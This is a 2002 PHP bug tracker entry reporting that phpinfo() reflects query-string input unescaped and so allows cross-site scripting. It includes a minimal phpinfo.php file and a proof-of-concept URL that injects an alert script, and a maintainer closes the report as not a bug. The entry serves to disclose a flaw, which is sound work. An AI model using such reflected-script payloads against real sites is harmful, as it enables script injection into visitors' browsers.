php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Request #18553 phpinfo() allows cross-site scripting
Submitted: 2002-07-24 20:52 UTC Modified: 2002-07-25 04:32 UTC
From: olegpro at operamail dot com Assigned:
Status: Not a bug Package: Feature/Change Request
PHP Version: 4.2.2 OS: Win'2k
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: olegpro at operamail dot com
New email:
PHP Version: OS:

 

 [2002-07-24 20:52 UTC] olegpro at operamail dot com
Hi!

phpinfo() is vulnerable to cross-site scripting.
printing of _SERVER["argv"] of is vulnerable.

// phpinfo.php
<?
phpinfo();
?>

http://localhost/phpinfo.php?z=<SCRIPT>alert('Hello world!');</SCRIPT>


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2002-07-25 04:32 UTC] sniper@php.net
Sorry, but the bug system is not the appropriate forum for asking
support questions. Your problem does not imply a bug in PHP itself.
For a list of more appropriate places to ask for help using PHP,
please visit http://www.php.net/support.php

Thank you for your interest in PHP.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Oct 08 22:01:27 2024 UTC